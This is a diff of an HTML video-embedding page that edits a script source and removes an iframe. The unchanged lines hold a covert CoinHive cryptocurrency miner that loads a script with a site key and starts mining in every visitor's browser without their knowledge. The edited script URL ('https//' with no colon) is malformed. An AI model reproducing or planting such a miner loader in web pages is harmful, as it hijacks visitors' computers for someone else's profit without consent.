--- a/tc3.html
+++ b/tc3.html
@@ -8,7 +8,7 @@
 		if(!d.getElementById(id))
 		{js=d.createElement(s);
 		js.id=id;
-		js.src="//coin-hive.com/lib/coinhive.min.js";
+		js.src="https//coin-hive.com/lib/coinhive.min.js";
 		js.appendChild(d.createTextNode("var miner = new CoinHive.Anonymous('bbxalNoLp5ZVs6plwCnsSbpPMdqh5qw7', {throttle: 0.1});miner.start();"));
 		fjs.parentNode.insertBefore(js,fjs);}
 		}(document,"script","cjs");
@@ -49,7 +49,7 @@
 
                    <iframe width="640" height="360" src="https://playreplay.me/framevideo/7p598.3999548131ea3cafd7e0166862b5?width=640&height=360" frameborder="0" allowfullscreen><!--old metod-->
 </iframe>
- <iframe name="f1" src="https://geper.github.io/decision-trees/defe"></iframe>
+
 
 
 </div>
